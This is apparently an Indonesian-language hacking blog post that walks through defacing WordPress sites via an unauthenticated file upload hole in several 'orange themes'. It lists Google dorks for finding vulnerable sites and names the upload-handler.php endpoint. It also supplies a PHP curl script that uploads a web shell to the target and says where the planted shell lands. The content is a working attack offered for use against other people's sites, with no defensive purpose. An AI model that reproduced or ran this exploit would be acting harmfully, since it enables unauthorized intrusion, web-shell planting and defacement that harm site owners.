Deface Dengan Exploit orange themes File Upload

Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell (Bisa Pakek Shell GCA)

Langkah-Langkah:
1).Search Di Google Gunakan Dork

inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"  

2).Ane Pkek Dork Yang inurl:"/wp-content/themes/radial-theme/"

3).Jika Ketemu Masukan Exploit /wp-content/themes/radial-theme/functions/upload-handler.php jika Keluar Error Situsnya Vuln

4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D

<?php
$uploadfile="shellKamu.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>



4).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D



5).Aktifkan XAMPP Klik Start Pada Apache




6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7).Ketik cd\xampp/php



8)ketik php namascript.php Contoh: php lol.php
9).Jika Succes Akan Ada Nama Shellnya :D




10).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/2013/11/namashell.php

SUMBER

Posted in: Hacking